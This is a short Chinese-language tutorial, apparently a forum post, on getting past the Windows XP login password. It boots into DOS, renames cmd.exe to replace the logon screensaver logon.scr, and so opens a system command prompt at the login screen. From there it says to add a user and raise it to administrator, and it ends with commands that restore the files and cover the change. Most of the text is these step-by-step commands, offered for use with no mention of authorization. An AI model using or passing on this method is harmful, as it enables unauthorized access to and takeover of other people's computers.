破解XP密码又一法(进入带密码的XP系统)

前提:能进入DOS系统，如果C:为NTFS就得支持NTFS格式的DOS系统，这个不用说，不然你进不了C： 的。

当进入DOS系统之后，执行下面命令：

１、C: 回车　/＊进入Ｃ盘
２、cd windows/system32
/*进入windows目录下的system32目录，本命令等价于cd windows 和 cd system32两个命令　
３、md logonbak　/*建立一个目录做文件备份 ,名字是任意的。你可以随便取
４、copy logon.scr logonbak　/*　将文件logon.scr　拷贝到我们建立的logonbak目录下
５、del logon.scr ／*删除logon.scr文件
６、ren cmd.exe logon.scr　/*把cmd.exe文件改名为logon.scr
重启。在登录界面等待。

说明：cmd.exe是系统的dos窗口程序.logon.scr是屏保程序。我们破解原理是等到屏保运行的时候运行的不是屏保程序而是ＤＯＳ命令窗口。进入窗口后就不用多说了。用命令添加用户再提升为管理员就ＯＫ。不知道添加用户的可以看"用命令添加用户并提升为管理员"

附加命令：rd 删除目录命令
　　　　　例如：我们在成功进入之后，我们要在dos状态下去恢复系统（windows下好像那个文件受保护的，改不了。删除我试过。没有试过用别的文件去覆盖)并删除建立的文件夹.假设现在目录就在system32下,不在可以通过上面讲到的命令进入.

ren logon.scr cmd.exe 把文件名改回去
copy logonbak\logon.scr 把备份的文件拷回来
del logonbak 删除备份文件夹下的文件,因为rd只能删除空的文件夹
rd logonbak 删除文件夹